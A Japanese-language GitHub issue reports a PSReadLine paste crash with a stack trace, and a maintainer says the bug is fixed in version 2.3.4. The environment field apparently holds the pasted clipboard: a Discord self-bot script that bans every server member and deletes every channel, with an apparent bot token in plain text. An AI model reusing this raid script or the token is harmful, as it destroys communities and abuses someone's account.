Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

バグが発見されましたみたいなのが出ました #3878

Closed
3 tasks done
kanimiso0noob opened this issue Nov 22, 2023 · 1 comment
Closed
3 tasks done

バグが発見されましたみたいなのが出ました #3878

kanimiso0noob opened this issue Nov 22, 2023 · 1 comment

Comments

@kanimiso0noob
Copy link

Prerequisites

  • Write a descriptive title.
  • Make sure you are able to repro it on the latest released version
  • Search the existing issues, especially the pinned issues.

Exception report

直前 1 個のキー:
 Ctrl+v

例外:
System.ArgumentOutOfRangeException: 値には 0 以上で、コンソールの次元のバッファー サイズ未満を指定しなければなりません。
パラメーター名:top
実際の値は -1 です。
   場所 System.Console.SetCursorPosition(Int32 left, Int32 top)
   場所 Microsoft.PowerShell.PSConsoleReadLine.ReallyRender(RenderData renderData, String defaultColor)
   場所 Microsoft.PowerShell.PSConsoleReadLine.ForceRender()
   場所 Microsoft.PowerShell.PSConsoleReadLine.Paste(Nullable`1 key, Object arg)
   場所 Microsoft.PowerShell.PSConsoleReadLine.ProcessOneKey(ConsoleKeyInfo key, Dictionary`2 dispatchTable, Boolean ignoreIfNoAction, Object 
arg)
   場所 Microsoft.PowerShell.PSConsoleReadLine.InputLoop()
   場所 Microsoft.PowerShell.PSConsoleReadLine.ReadLine(Runspace runspace, EngineIntrinsics engineIntrinsics)

Screenshot

さぁ

Environment data

import discord
from discord.ext import commands

# サーバーIDを入力してください。
server_id = 1176517749309186068

bot = commands.Bot(command_prefix=">", self_bot=True)

@bot.event
async def on_ready():
    print('ログインしました:', bot.user.name)

@bot.command()
async def ban(ctx):
    # メッセージが指定のサーバーから送信されたか確認
    if ctx.guild.id == server_id:
        banned_users = []  # banされたユーザーのusernameを格納するリスト

        # サーバーに所属するすべてのユーザーをban
        for member in ctx.guild.members:
            try:
                await member.ban(reason="指定のコマンドによるban")
                banned_users.append(member.name)  # usernameをリストに追加
            except discord.Forbidden:
                # ボットの権限が不足している場合はForbiddenエラーが発生する
                print(f"Botの権限が不足しています。{member.name} をbanできません。")

        # banされたユーザーのusernameを表示
        print("以下のユーザーがbanされました:")
        for username in banned_users:
            print(username)

@bot.command()
async def clear(ctx):
    # 全てのチャンネルを取得
    channels = ctx.guild.channels

    # 全てのチャンネルを削除
    for channel in channels:
        await channel.delete()

    print('全てのチャンネルが削除されました。')


bot.run("MTE3Njc4OTA3ODAyOTYzNTY2NA.G3TJ7K.2noF1GjoWIwZFLTfNVypws9Ns2huqeQiqzI-1o")

Steps to reproduce

わからん

Expected behavior

わからん

Actual behavior

コピペが出来ない

@microsoft-github-policy-service microsoft-github-policy-service bot added the Needs-Triage 🔍 It's a new issue that core contributor team needs to triage. label Nov 22, 2023
Copy link

This issue was already fixed (see #1306). Please upgrade to the 2.3.4 version of PSReadLine from PowerShell Gallery.
See the upgrading section for instructions. Please let us know if you run into the same issue with the latest version.

@microsoft-github-policy-service microsoft-github-policy-service bot removed the Needs-Triage 🔍 It's a new issue that core contributor team needs to triage. label Nov 22, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant